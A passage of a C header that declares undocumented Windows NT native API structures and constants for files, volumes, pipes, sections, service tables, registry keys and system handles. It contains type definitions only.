FileRenameInformationExBypassAccessCheck,\n FileDesiredStorageClassInformation,\n FileStatInformation,\n FileMemoryPartitionInformation,\n FileStatLxInformation,\n FileCaseSensitiveInformation,\n FileLinkInformationEx,\n FileLinkInformationExBypassAccessCheck,\n FileStorageReserveIdInformation,\n FileCaseSensitiveInformationForceAccessCheck,\n FileKnownFolderInformation,\n FileStatBasicInformation,\n FileId64ExtdDirectoryInformation,\n FileId64ExtdBothDirectoryInformation,\n FileIdAllExtdDirectoryInformation,\n FileIdAllExtdBothDirectoryInformation,\n FileStreamReservationInformation,\n FileMaximumInformation\n} FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS;\n\ntypedef enum _FSINFOCLASS {\n FileFsVolumeInformation = 1,\n FileFsLabelInformation,\n FileFsSizeInformation,\n FileFsDeviceInformation,\n FileFsAttributeInformation,\n FileFsControlInformation,\n FileFsFullSizeInformation,\n FileFsObjectIdInformation,\n FileFsDriverPathInformation,\n FileFsVolumeFlagsInformation,\n FileFsSectorSizeInformation,\n FileFsDataCopyInformation,\n FileFsMetadataSizeInformation,\n FileFsFullSizeInformationEx,\n FileFsGuidInformation,\n FileFsMaximumInformation\n} FS_INFORMATION_CLASS, *PFS_INFORMATION_CLASS;\n\ntypedef struct _FILE_BASIC_INFORMATION {\n LARGE_INTEGER CreationTime;\n LARGE_INTEGER LastAccessTime;\n LARGE_INTEGER LastWriteTime;\n LARGE_INTEGER ChangeTime;\n ULONG FileAttributes;\n} FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION;\n\ntypedef struct _FILE_STANDARD_INFORMATION {\n LARGE_INTEGER AllocationSize;\n LARGE_INTEGER EndOfFile;\n ULONG NumberOfLinks;\n UCHAR DeletePending;\n UCHAR Directory;\n} FILE_STANDARD_INFORMATION;\n\ntypedef struct _FILE_STANDARD_INFORMATION_EX {\n LARGE_INTEGER AllocationSize;\n LARGE_INTEGER EndOfFile;\n ULONG NumberOfLinks;\n BOOLEAN DeletePending;\n BOOLEAN Directory;\n BOOLEAN AlternateStream;\n BOOLEAN MetadataAttribute;\n} FILE_STANDARD_INFORMATION_EX, *PFILE_STANDARD_INFORMATION_EX;\n\ntypedef struct _FILE_INTERNAL_INFORMATION {\n LARGE_INTEGER IndexNumber;\n} FILE_INTERNAL_INFORMATION, *PFILE_INTERNAL_INFORMATION;\n\ntypedef struct _FILE_EA_INFORMATION {\n ULONG EaSize;\n} FILE_EA_INFORMATION, *PFILE_EA_INFORMATION;\n\ntypedef struct _FILE_ACCESS_INFORMATION {\n ACCESS_MASK AccessFlags;\n} FILE_ACCESS_INFORMATION, *PFILE_ACCESS_INFORMATION;\n\ntypedef struct _FILE_POSITION_INFORMATION {\n LARGE_INTEGER CurrentByteOffset;\n} FILE_POSITION_INFORMATION, *PFILE_POSITION_INFORMATION;\n\ntypedef struct _FILE_MODE_INFORMATION {\n ULONG Mode;\n} FILE_MODE_INFORMATION, *PFILE_MODE_INFORMATION;\n\ntypedef struct _FILE_ALIGNMENT_INFORMATION {\n ULONG AlignmentRequirement;\n} FILE_ALIGNMENT_INFORMATION, *PFILE_ALIGNMENT_INFORMATION;\n\ntypedef struct _FILE_NAME_INFORMATION {\n ULONG FileNameLength;\n WCHAR FileName[1];\n} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION;\n\ntypedef struct _FILE_ALL_INFORMATION {\n FILE_BASIC_INFORMATION BasicInformation;\n FILE_STANDARD_INFORMATION StandardInformation;\n FILE_INTERNAL_INFORMATION InternalInformation;\n FILE_EA_INFORMATION EaInformation;\n FILE_ACCESS_INFORMATION AccessInformation;\n FILE_POSITION_INFORMATION PositionInformation;\n FILE_MODE_INFORMATION ModeInformation;\n FILE_ALIGNMENT_INFORMATION AlignmentInformation;\n FILE_NAME_INFORMATION NameInformation;\n} FILE_ALL_INFORMATION, *PFILE_ALL_INFORMATION;\n\ntypedef struct _FILE_NETWORK_OPEN_INFORMATION {\n LARGE_INTEGER CreationTime;\n LARGE_INTEGER LastAccessTime;\n LARGE_INTEGER LastWriteTime;\n LARGE_INTEGER ChangeTime;\n LARGE_INTEGER AllocationSize;\n LARGE_INTEGER EndOfFile;\n ULONG FileAttributes;\n} FILE_NETWORK_OPEN_INFORMATION, *PFILE_NETWORK_OPEN_INFORMATION;\n\ntypedef struct _FILE_ATTRIBUTE_TAG_INFORMATION {\n ULONG FileAttributes;\n ULONG ReparseTag;\n} FILE_ATTRIBUTE_TAG_INFORMATION, *PFILE_ATTRIBUTE_TAG_INFORMATION;\n\ntypedef struct _FILE_ALLOCATION_INFORMATION {\n LARGE_INTEGER AllocationSize;\n} FILE_ALLOCATION_INFORMATION, *PFILE_ALLOCATION_INFORMATION;\n\ntypedef struct _FILE_COMPRESSION_INFORMATION {\n LARGE_INTEGER CompressedFileSize;\n USHORT CompressionFormat;\n UCHAR CompressionUnitShift;\n UCHAR ChunkShift;\n UCHAR ClusterShift;\n UCHAR Reserved[3];\n} FILE_COMPRESSION_INFORMATION, *PFILE_COMPRESSION_INFORMATION;\n\ntypedef struct _FILE_DISPOSITION_INFORMATION {\n BOOLEAN DeleteFile;\n} FILE_DISPOSITION_INFORMATION, *PFILE_DISPOSITION_INFORMATION;\n\ntypedef struct _FILE_END_OF_FILE_INFORMATION {\n LARGE_INTEGER EndOfFile;\n} FILE_END_OF_FILE_INFORMATION, *PFILE_END_OF_FILE_INFORMATION;\n\ntypedef struct _FILE_VALID_DATA_LENGTH_INFORMATION {\n LARGE_INTEGER ValidDataLength;\n} FILE_VALID_DATA_LENGTH_INFORMATION, *PFILE_VALID_DATA_LENGTH_INFORMATION;\n\ntypedef struct _FILE_LINK_INFORMATION {\n BOOLEAN ReplaceIfExists;\n HANDLE RootDirectory;\n ULONG FileNameLength;\n WCHAR FileName[1];\n} FILE_LINK_INFORMATION, *PFILE_LINK_INFORMATION;\n\ntypedef struct _FILE_MOVE_CLUSTER_INFORMATION {\n ULONG ClusterCount;\n HANDLE RootDirectory;\n ULONG FileNameLength;\n WCHAR FileName[1];\n} FILE_MOVE_CLUSTER_INFORMATION, *PFILE_MOVE_CLUSTER_INFORMATION;\n\ntypedef struct _FILE_RENAME_INFORMATION {\n BOOLEAN ReplaceIfExists;\n HANDLE RootDirectory;\n ULONG FileNameLength;\n WCHAR FileName[1];\n} FILE_RENAME_INFORMATION, *PFILE_RENAME_INFORMATION;\n\ntypedef struct _FILE_STREAM_INFORMATION {\n ULONG NextEntryOffset;\n ULONG StreamNameLength;\n LARGE_INTEGER StreamSize;\n LARGE_INTEGER StreamAllocationSize;\n WCHAR StreamName[1];\n} FILE_STREAM_INFORMATION, *PFILE_STREAM_INFORMATION;\n\ntypedef struct _FILE_TRACKING_INFORMATION {\n HANDLE DestinationFile;\n ULONG ObjectInformationLength;\n CHAR ObjectInformation[1];\n} FILE_TRACKING_INFORMATION, *PFILE_TRACKING_INFORMATION;\n\ntypedef struct _FILE_COMPLETION_INFORMATION {\n HANDLE Port;\n PVOID Key;\n} FILE_COMPLETION_INFORMATION, *PFILE_COMPLETION_INFORMATION;\n\n//\n// Define the NamedPipeType flags for NtCreateNamedPipeFile\n//\n\n#define FILE_PIPE_BYTE_STREAM_TYPE 0x00000000\n#define FILE_PIPE_MESSAGE_TYPE 0x00000001\n\n//\n// Define the CompletionMode flags for NtCreateNamedPipeFile\n//\n\n#define FILE_PIPE_QUEUE_OPERATION 0x00000000\n#define FILE_PIPE_COMPLETE_OPERATION 0x00000001\n\n//\n// Define the ReadMode flags for NtCreateNamedPipeFile\n//\n\n#define FILE_PIPE_BYTE_STREAM_MODE 0x00000000\n#define FILE_PIPE_MESSAGE_MODE 0x00000001\n\n//\n// Define the NamedPipeConfiguration flags for NtQueryInformation\n//\n\n#define FILE_PIPE_INBOUND 0x00000000\n#define FILE_PIPE_OUTBOUND 0x00000001\n#define FILE_PIPE_FULL_DUPLEX 0x00000002\n\n//\n// Define the NamedPipeState flags for NtQueryInformation\n//\n\n#define FILE_PIPE_DISCONNECTED_STATE 0x00000001\n#define FILE_PIPE_LISTENING_STATE 0x00000002\n#define FILE_PIPE_CONNECTED_STATE 0x00000003\n#define FILE_PIPE_CLOSING_STATE 0x00000004\n\n//\n// Define the NamedPipeEnd flags for NtQueryInformation\n//\n\n#define FILE_PIPE_CLIENT_END 0x00000000\n#define FILE_PIPE_SERVER_END 0x00000001\n\n\ntypedef struct _FILE_PIPE_INFORMATION {\n ULONG ReadMode;\n ULONG CompletionMode;\n} FILE_PIPE_INFORMATION, *PFILE_PIPE_INFORMATION;\n\ntypedef struct _FILE_PIPE_LOCAL_INFORMATION {\n ULONG NamedPipeType;\n ULONG NamedPipeConfiguration;\n ULONG MaximumInstances;\n ULONG CurrentInstances;\n ULONG InboundQuota;\n ULONG ReadDataAvailable;\n ULONG OutboundQuota;\n ULONG WriteQuotaAvailable;\n ULONG NamedPipeState;\n ULONG NamedPipeEnd;\n} FILE_PIPE_LOCAL_INFORMATION, *PFILE_PIPE_LOCAL_INFORMATION;\n\ntypedef struct _FILE_PIPE_REMOTE_INFORMATION {\n LARGE_INTEGER CollectDataTime;\n ULONG MaximumCollectionCount;\n} FILE_PIPE_REMOTE_INFORMATION, *PFILE_PIPE_REMOTE_INFORMATION;\n\ntypedef struct _FILE_MAILSLOT_QUERY_INFORMATION {\n ULONG MaximumMessageSize;\n ULONG MailslotQuota;\n ULONG NextMessageSize;\n ULONG MessagesAvailable;\n LARGE_INTEGER ReadTimeout;\n} FILE_MAILSLOT_QUERY_INFORMATION, *PFILE_MAILSLOT_QUERY_INFORMATION;\n\ntypedef struct _FILE_MAILSLOT_SET_INFORMATION {\n PLARGE_INTEGER ReadTimeout;\n} FILE_MAILSLOT_SET_INFORMATION, *PFILE_MAILSLOT_SET_INFORMATION;\n\ntypedef struct _FILE_REPARSE_POINT_INFORMATION {\n LONGLONG FileReference;\n ULONG Tag;\n} FILE_REPARSE_POINT_INFORMATION, *PFILE_REPARSE_POINT_INFORMATION;\n\ntypedef struct _FILE_LINK_ENTRY_INFORMATION {\n ULONG NextEntryOffset;\n LONGLONG ParentFileId;\n ULONG FileNameLength;\n WCHAR FileName[1];\n} FILE_LINK_ENTRY_INFORMATION, *PFILE_LINK_ENTRY_INFORMATION;\n\ntypedef struct _FILE_LINKS_INFORMATION {\n ULONG BytesNeeded;\n ULONG EntriesReturned;\n FILE_LINK_ENTRY_INFORMATION Entry;\n} FILE_LINKS_INFORMATION, *PFILE_LINKS_INFORMATION;\n\ntypedef struct _FILE_NETWORK_PHYSICAL_NAME_INFORMATION {\n ULONG FileNameLength;\n WCHAR FileName[1];\n} FILE_NETWORK_PHYSICAL_NAME_INFORMATION, *PFILE_NETWORK_PHYSICAL_NAME_INFORMATION;\n\ntypedef struct _FILE_STANDARD_LINK_INFORMATION {\n ULONG NumberOfAccessibleLinks;\n ULONG TotalNumberOfLinks;\n BOOLEAN DeletePending;\n BOOLEAN Directory;\n} FILE_STANDARD_LINK_INFORMATION, *PFILE_STANDARD_LINK_INFORMATION;\n\ntypedef struct _FILE_SFIO_RESERVE_INFORMATION {\n ULONG RequestsPerPeriod;\n ULONG Period;\n BOOLEAN RetryFailures;\n BOOLEAN Discardable;\n ULONG RequestSize;\n ULONG NumOutstandingRequests;\n} FILE_SFIO_RESERVE_INFORMATION, *PFILE_SFIO_RESERVE_INFORMATION;\n\ntypedef struct _FILE_SFIO_VOLUME_INFORMATION {\n ULONG MaximumRequestsPerPeriod;\n ULONG MinimumPeriod;\n ULONG MinimumTransferSize;\n} FILE_SFIO_VOLUME_INFORMATION, *PFILE_SFIO_VOLUME_INFORMATION;\n\n//\n// Define the flags for NtSet(Query)EaFile service structure entries\n//\n\n#define FILE_NEED_EA 0x00000080\n\n//\n// Define EA type values\n//\n\n#define FILE_EA_TYPE_BINARY 0xfffe\n#define FILE_EA_TYPE_ASCII 0xfffd\n#define FILE_EA_TYPE_BITMAP 0xfffb\n#define FILE_EA_TYPE_METAFILE 0xfffa\n#define FILE_EA_TYPE_ICON 0xfff9\n#define FILE_EA_TYPE_EA 0xffee\n#define FILE_EA_TYPE_MVMT 0xffdf\n#define FILE_EA_TYPE_MVST 0xffde\n#define FILE_EA_TYPE_ASN1 0xffdd\n#define FILE_EA_TYPE_FAMILY_IDS 0xff01\n\ntypedef struct _FILE_FULL_EA_INFORMATION {\n ULONG NextEntryOffset;\n UCHAR Flags;\n UCHAR EaNameLength;\n USHORT EaValueLength;\n CHAR EaName[1];\n} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;\n\ntypedef struct _FILE_GET_EA_INFORMATION {\n ULONG NextEntryOffset;\n UCHAR EaNameLength;\n CHAR EaName[1];\n} FILE_GET_EA_INFORMATION, *PFILE_GET_EA_INFORMATION;\n\ntypedef struct _FILE_GET_QUOTA_INFORMATION {\n ULONG NextEntryOffset;\n ULONG SidLength;\n SID Sid;\n} FILE_GET_QUOTA_INFORMATION, *PFILE_GET_QUOTA_INFORMATION;\n\ntypedef struct _FILE_QUOTA_INFORMATION {\n ULONG NextEntryOffset;\n ULONG SidLength;\n LARGE_INTEGER ChangeTime;\n LARGE_INTEGER QuotaUsed;\n LARGE_INTEGER QuotaThreshold;\n LARGE_INTEGER QuotaLimit;\n SID Sid;\n} FILE_QUOTA_INFORMATION, *PFILE_QUOTA_INFORMATION;\n\ntypedef struct _FILE_DIRECTORY_INFORMATION {\n ULONG NextEntryOffset;\n ULONG FileIndex;\n LARGE_INTEGER CreationTime;\n LARGE_INTEGER LastAccessTime;\n LARGE_INTEGER LastWriteTime;\n LARGE_INTEGER ChangeTime;\n LARGE_INTEGER EndOfFile;\n LARGE_INTEGER AllocationSize;\n ULONG FileAttributes;\n ULONG FileNameLength;\n WCHAR FileName[1];\n} FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION;\n\ntypedef struct _FILE_FULL_DIR_INFORMATION {\n ULONG NextEntryOffset;\n ULONG FileIndex;\n LARGE_INTEGER CreationTime;\n LARGE_INTEGER LastAccessTime;\n LARGE_INTEGER LastWriteTime;\n LARGE_INTEGER ChangeTime;\n LARGE_INTEGER EndOfFile;\n LARGE_INTEGER AllocationSize;\n ULONG FileAttributes;\n ULONG FileNameLength;\n ULONG EaSize;\n WCHAR FileName[1];\n} FILE_FULL_DIR_INFORMATION, *PFILE_FULL_DIR_INFORMATION;\n\ntypedef struct _FILE_ID_FULL_DIR_INFORMATION {\n ULONG NextEntryOffset;\n ULONG FileIndex;\n LARGE_INTEGER CreationTime;\n LARGE_INTEGER LastAccessTime;\n LARGE_INTEGER LastWriteTime;\n LARGE_INTEGER ChangeTime;\n LARGE_INTEGER EndOfFile;\n LARGE_INTEGER AllocationSize;\n ULONG FileAttributes;\n ULONG FileNameLength;\n ULONG EaSize;\n LARGE_INTEGER FileId;\n WCHAR FileName[1];\n} FILE_ID_FULL_DIR_INFORMATION, *PFILE_ID_FULL_DIR_INFORMATION;\n\ntypedef struct _FILE_BOTH_DIR_INFORMATION {\n ULONG NextEntryOffset;\n ULONG FileIndex;\n LARGE_INTEGER CreationTime;\n LARGE_INTEGER LastAccessTime;\n LARGE_INTEGER LastWriteTime;\n LARGE_INTEGER ChangeTime;\n LARGE_INTEGER EndOfFile;\n LARGE_INTEGER AllocationSize;\n ULONG FileAttributes;\n ULONG FileNameLength;\n ULONG EaSize;\n CCHAR ShortNameLength;\n WCHAR ShortName[12];\n WCHAR FileName[1];\n} FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION;\n\ntypedef struct _FILE_ID_BOTH_DIR_INFORMATION {\n ULONG NextEntryOffset;\n ULONG FileIndex;\n LARGE_INTEGER CreationTime;\n LARGE_INTEGER LastAccessTime;\n LARGE_INTEGER LastWriteTime;\n LARGE_INTEGER ChangeTime;\n LARGE_INTEGER EndOfFile;\n LARGE_INTEGER AllocationSize;\n ULONG FileAttributes;\n ULONG FileNameLength;\n ULONG EaSize;\n CCHAR ShortNameLength;\n WCHAR ShortName[12];\n LARGE_INTEGER FileId;\n WCHAR FileName[1];\n} FILE_ID_BOTH_DIR_INFORMATION, *PFILE_ID_BOTH_DIR_INFORMATION;\n\ntypedef struct _FILE_NAMES_INFORMATION {\n ULONG NextEntryOffset;\n ULONG FileIndex;\n ULONG FileNameLength;\n WCHAR FileName[1];\n} FILE_NAMES_INFORMATION, *PFILE_NAMES_INFORMATION;\n\ntypedef struct _FILE_OBJECTID_INFORMATION {\n LONGLONG FileReference;\n UCHAR ObjectId[16];\n union {\n struct {\n UCHAR BirthVolumeId[16];\n UCHAR BirthObjectId[16];\n UCHAR DomainId[16];\n };\n UCHAR ExtendedInfo[48];\n };\n} FILE_OBJECTID_INFORMATION, *PFILE_OBJECTID_INFORMATION;\n\ntypedef struct _FILE_FS_VOLUME_INFORMATION {\n LARGE_INTEGER VolumeCreationTime;\n ULONG VolumeSerialNumber;\n ULONG VolumeLabelLength;\n BOOLEAN SupportsObjects;\n WCHAR VolumeLabel[1];\n} FILE_FS_VOLUME_INFORMATION, *PFILE_FS_VOLUME_INFORMATION;\n\ntypedef struct _FILE_ID_GLOBAL_TX_DIR_INFORMATION\n{\n ULONG NextEntryOffset;\n ULONG FileIndex;\n LARGE_INTEGER CreationTime;\n LARGE_INTEGER LastAccessTime;\n LARGE_INTEGER LastWriteTime;\n LARGE_INTEGER ChangeTime;\n LARGE_INTEGER EndOfFile;\n LARGE_INTEGER AllocationSize;\n ULONG FileAttributes;\n ULONG FileNameLength;\n LARGE_INTEGER FileId;\n GUID LockingTransactionId;\n ULONG TxInfoFlags;\n WCHAR FileName[1];\n} FILE_ID_GLOBAL_TX_DIR_INFORMATION, *PFILE_ID_GLOBAL_TX_DIR_INFORMATION;\n\n/*\n** File END\n*/\n\n/*\n** Section START\n*/\n\ntypedef enum _SECTION_INFORMATION_CLASS {\n SectionBasicInformation,\n SectionImageInformation,\n SectionRelocationInformation,\n SectionOriginalBaseInformation,\n SectionInternalImageInformation,\n MaxSectionInfoClass\n} SECTION_INFORMATION_CLASS;\n\ntypedef struct _SECTION_BASIC_INFO {\n PVOID BaseAddress;\n ULONG AllocationAttributes;\n LARGE_INTEGER MaximumSize;\n} SECTION_BASIC_INFORMATION, *PSECTION_BASIC_INFORMATION;\n\ntypedef struct _SECTION_IMAGE_INFORMATION {\n PVOID TransferAddress;\n ULONG ZeroBits;\n SIZE_T MaximumStackSize;\n SIZE_T CommittedStackSize;\n ULONG SubSystemType;\n union {\n struct {\n USHORT SubSystemMinorVersion;\n USHORT SubSystemMajorVersion;\n };\n ULONG SubSystemVersion;\n };\n union\n {\n struct\n {\n USHORT MajorOperatingSystemVersion;\n USHORT MinorOperatingSystemVersion;\n };\n ULONG OperatingSystemVersion;\n };\n USHORT ImageCharacteristics;\n USHORT DllCharacteristics;\n USHORT Machine;\n BOOLEAN ImageContainsCode;\n union\n {\n UCHAR ImageFlags;\n struct\n {\n UCHAR ComPlusNativeReady : 1;\n UCHAR ComPlusILOnly : 1;\n UCHAR ImageDynamicallyRelocated : 1;\n UCHAR ImageMappedFlat : 1;\n UCHAR BaseBelow4gb : 1;\n UCHAR ComPlusPrefer32bit : 1;\n UCHAR Reserved : 2;\n };\n };\n ULONG LoaderFlags;\n ULONG ImageFileSize;\n ULONG CheckSum;\n} SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION;\n\ntypedef struct _MI_EXTRA_IMAGE_INFORMATION {\n ULONG SizeOfHeaders;\n ULONG SizeOfImage;\n} MI_EXTRA_IMAGE_INFORMATION, *PMI_EXTRA_IMAGE_INFORMATION;\n\ntypedef struct _MI_SECTION_IMAGE_INFORMATION {\n SECTION_IMAGE_INFORMATION ExportedImageInformation;\n MI_EXTRA_IMAGE_INFORMATION InternalImageInformation;\n} MI_SECTION_IMAGE_INFORMATION, *PMI_SECTION_IMAGE_INFORMATION;\n\ntypedef struct _SECTION_IMAGE_INFORMATION64 {\n ULONGLONG TransferAddress;\n ULONG ZeroBits;\n ULONGLONG MaximumStackSize;\n ULONGLONG CommittedStackSize;\n ULONG SubSystemType;\n union {\n struct {\n USHORT SubSystemMinorVersion;\n USHORT SubSystemMajorVersion;\n };\n ULONG SubSystemVersion;\n };\n union\n {\n struct\n {\n USHORT MajorOperatingSystemVersion;\n USHORT MinorOperatingSystemVersion;\n };\n ULONG OperatingSystemVersion;\n };\n USHORT ImageCharacteristics;\n USHORT DllCharacteristics;\n USHORT Machine;\n BOOLEAN ImageContainsCode;\n union\n {\n UCHAR ImageFlags;\n struct\n {\n UCHAR ComPlusNativeReady : 1;\n UCHAR ComPlusILOnly : 1;\n UCHAR ImageDynamicallyRelocated : 1;\n UCHAR ImageMappedFlat : 1;\n UCHAR BaseBelow4gb : 1;\n UCHAR ComPlusPrefer32bit : 1;\n UCHAR Reserved : 2;\n };\n };\n ULONG LoaderFlags;\n ULONG ImageFileSize;\n ULONG CheckSum;\n} SECTION_IMAGE_INFORMATION64, *PSECTION_IMAGE_INFORMATION64;\n\ntypedef struct _SECTION_INTERNAL_IMAGE_INFORMATION {\n SECTION_IMAGE_INFORMATION SectionInformation;\n union\n {\n ULONG ExtendedFlags;\n struct\n {\n ULONG ImageExportSuppressionEnabled : 1;\n ULONG ImageCetShadowStacksReady : 1; // 20H1\n ULONG ImageXfgEnabled : 1; // 20H2\n ULONG ImageCetShadowStacksStrictMode : 1;\n ULONG ImageCetSetContextIpValidationRelaxedMode : 1;\n ULONG ImageCetDynamicApisAllowInProc : 1;\n ULONG ImageCetDowngradeReserved1 : 1;\n ULONG ImageCetDowngradeReserved2 : 1;\n ULONG Reserved : 24;\n };\n };\n} SECTION_INTERNAL_IMAGE_INFORMATION, * PSECTION_INTERNAL_IMAGE_INFORMATION;\n\ntypedef enum _SECTION_INHERIT {\n ViewShare = 1,\n ViewUnmap = 2\n} SECTION_INHERIT;\n\n#ifndef SEC_BASED\n#define SEC_BASED 0x200000\n#endif\n\n#ifndef SEC_NO_IMAGE\n#define SEC_NO_CHANGE 0x400000\n#endif\n\n#ifndef SEC_FILE\n#define SEC_FILE 0x800000 \n#endif\n\n#ifndef SEC_IMAGE\n#define SEC_IMAGE 0x1000000 \n#endif\n\n#ifndef SEC_RESERVE\n#define SEC_RESERVE 0x4000000 \n#endif\n\n#ifndef SEC_COMMIT\n#define SEC_COMMIT 0x8000000 \n#endif\n\n#ifndef SEC_NOCACHE\n#define SEC_NOCACHE 0x10000000 \n#endif\n\n#ifndef SEC_GLOBAL\n#define SEC_GLOBAL 0x20000000\n#endif\n\n#ifndef SEC_LARGE_PAGES\n#define SEC_LARGE_PAGES 0x80000000 \n#endif\n\n/*\n** Section END\n*/\n\n/*\n** System Table START\n*/\n#define NUMBER_SERVICE_TABLES 2\n#define NTOS_SERVICE_INDEX 0\n#define WIN32K_SERVICE_INDEX 1\n#define SERVICE_NUMBER_MASK ((1 << 12) - 1)\n\n#if defined(_WIN64)\n\n#if defined(_AMD64_)\n\n#define SERVICE_TABLE_SHIFT (12 - 4)\n#define SERVICE_TABLE_MASK (((1 << 1) - 1) << 4)\n#define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 4)\n\n#else\n\n#define SERVICE_TABLE_SHIFT (12 - 5)\n#define SERVICE_TABLE_MASK (((1 << 1) - 1) << 5)\n#define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 5)\n\n#endif\n\n#else\n\n#define SERVICE_TABLE_SHIFT (12 - 4)\n#define SERVICE_TABLE_MASK (((1 << 1) - 1) << 4)\n#define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 4)\n\n#endif\n\ntypedef struct _KSERVICE_TABLE_DESCRIPTOR {\n ULONG_PTR Base; //e.g. KiServiceTable\n PULONG Count;\n ULONG Limit;//e.g. KiServiceLimit\n PUCHAR Number; //e.g. KiArgumentTable\n} KSERVICE_TABLE_DESCRIPTOR, *PKSERVICE_TABLE_DESCRIPTOR;\n/*\n** System Table END\n*/\n\n/*\n** System Boot Environment START\n*/\n\n// Size=20\ntypedef struct _SYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1 {\n GUID BootIdentifier;\n FIRMWARE_TYPE FirmwareType;\n} SYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1, *PSYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1;\n\n// Size=32\ntypedef struct _SYSTEM_BOOT_ENVIRONMENT_INFORMATION {\n GUID BootIdentifier;\n FIRMWARE_TYPE FirmwareType;\n union\n {\n ULONGLONG BootFlags;\n struct\n {\n ULONGLONG DbgMenuOsSelection : 1; // RS4\n ULONGLONG DbgHiberBoot : 1;\n ULONGLONG DbgSoftBoot : 1;\n ULONGLONG DbgMeasuredLaunch : 1;\n ULONGLONG DbgMeasuredLaunchCapable : 1; // 19H1\n ULONGLONG DbgSystemHiveReplace : 1;\n ULONGLONG DbgMeasuredLaunchSmmProtections : 1;\n ULONGLONG DbgMeasuredLaunchSmmLevel : 7; // 20H1\n };\n };\n} SYSTEM_BOOT_ENVIRONMENT_INFORMATION, *PSYSTEM_BOOT_ENVIRONMENT_INFORMATION;\n\n/*\n** System Boot Environment END\n*/\n\n/*\n** Key START\n*/\n\ntypedef enum _KEY_INFORMATION_CLASS {\n KeyBasicInformation,\n KeyNodeInformation,\n KeyFullInformation,\n KeyNameInformation,\n KeyCachedInformation,\n KeyFlagsInformation,\n KeyVirtualizationInformation,\n KeyHandleTagsInformation,\n KeyTrustInformation,\n KeyLayerInformation,\n MaxKeyInfoClass\n} KEY_INFORMATION_CLASS;\n\ntypedef enum _KEY_SET_INFORMATION_CLASS {\n KeyWriteTimeInformation,\n KeyWow64FlagsInformation,\n KeyControlFlagsInformation,\n KeySetVirtualizationInformation,\n KeySetDebugInformation,\n KeySetHandleTagsInformation,\n KeySetLayerInformation,\n MaxKeySetInfoClass\n} KEY_SET_INFORMATION_CLASS;\n\ntypedef struct _KEY_FULL_INFORMATION {\n LARGE_INTEGER LastWriteTime;\n ULONG TitleIndex;\n ULONG ClassOffset;\n ULONG ClassLength;\n ULONG SubKeys;\n ULONG MaxNameLen;\n ULONG MaxClassLen;\n ULONG Values;\n ULONG MaxValueNameLen;\n ULONG MaxValueDataLen;\n WCHAR Class[1];\n} KEY_FULL_INFORMATION, *PKEY_FULL_INFORMATION;\n\ntypedef struct _KEY_BASIC_INFORMATION {\n LARGE_INTEGER LastWriteTime;\n ULONG TitleIndex;\n ULONG NameLength;\n WCHAR Name[1];\n} KEY_BASIC_INFORMATION, *PKEY_BASIC_INFORMATION;\n\ntypedef enum _KEY_VALUE_INFORMATION_CLASS {\n KeyValueBasicInformation,\n KeyValueFullInformation,\n KeyValuePartialInformation,\n KeyValueFullInformationAlign64,\n KeyValuePartialInformationAlign64,\n KeyValueLayerInformation,\n MaxKeyValueInfoClass\n} KEY_VALUE_INFORMATION_CLASS;\n\ntypedef struct _KEY_VALUE_BASIC_INFORMATION {\n ULONG TitleIndex;\n ULONG Type;\n ULONG NameLength;\n WCHAR Name[1]; // Variable size\n} KEY_VALUE_BASIC_INFORMATION, *PKEY_VALUE_BASIC_INFORMATION;\n\ntypedef struct _KEY_VALUE_FULL_INFORMATION {\n ULONG TitleIndex;\n ULONG Type;\n ULONG DataOffset;\n ULONG DataLength;\n ULONG NameLength;\n WCHAR Name[1]; // Variable size\n // Data[1]; // Variable size data not declared\n} KEY_VALUE_FULL_INFORMATION, *PKEY_VALUE_FULL_INFORMATION;\n\ntypedef struct _KEY_VALUE_PARTIAL_INFORMATION {\n ULONG TitleIndex;\n ULONG Type;\n ULONG DataLength;\n UCHAR Data[1]; // Variable size\n} KEY_VALUE_PARTIAL_INFORMATION, *PKEY_VALUE_PARTIAL_INFORMATION;\n\ntypedef struct _KEY_VALUE_PARTIAL_INFORMATION_ALIGN64 {\n ULONG Type;\n ULONG DataLength;\n UCHAR Data[1]; // Variable size\n} KEY_VALUE_PARTIAL_INFORMATION_ALIGN64, *PKEY_VALUE_PARTIAL_INFORMATION_ALIGN64;\n\ntypedef struct _KEY_VALUE_ENTRY {\n PUNICODE_STRING ValueName;\n ULONG DataLength;\n ULONG DataOffset;\n ULONG Type;\n} KEY_VALUE_ENTRY, *PKEY_VALUE_ENTRY;\n\n/*\n** Key END\n*/\n\n\n/*\n** TIME_FIELDS START\n*/\n\ntypedef struct _TIME_FIELDS {\n CSHORT Year; // range [1601...]\n CSHORT Month; // range [1..12]\n CSHORT Day; // range [1..31]\n CSHORT Hour; // range [0..23]\n CSHORT Minute; // range [0..59]\n CSHORT Second; // range [0..59]\n CSHORT Milliseconds;// range [0..999]\n CSHORT Weekday; // range [0..6] == [Sunday..Saturday]\n} TIME_FIELDS;\ntypedef TIME_FIELDS *PTIME_FIELDS;\n\n/*\n** TIME_FIELDS END\n*/\n\n/*\n** HANDLE START\n*/\n\ntypedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {\n USHORT UniqueProcessId;\n USHORT CreatorBackTraceIndex;\n UCHAR ObjectTypeIndex;\n UCHAR HandleAttributes;\n USHORT HandleValue;\n PVOID Object;\n ULONG GrantedAccess;\n} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO;\n\ntypedef struct _SYSTEM_HANDLE_INFORMATION {\n ULONG NumberOfHandles;\n SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];\n} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;\n\ntypedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX {\n PVOID Object;\n ULONG_PTR UniqueProcessId;\n ULONG_PTR HandleValue;\n ULONG GrantedAccess;\n USHORT CreatorBackTraceIndex;\n USHORT 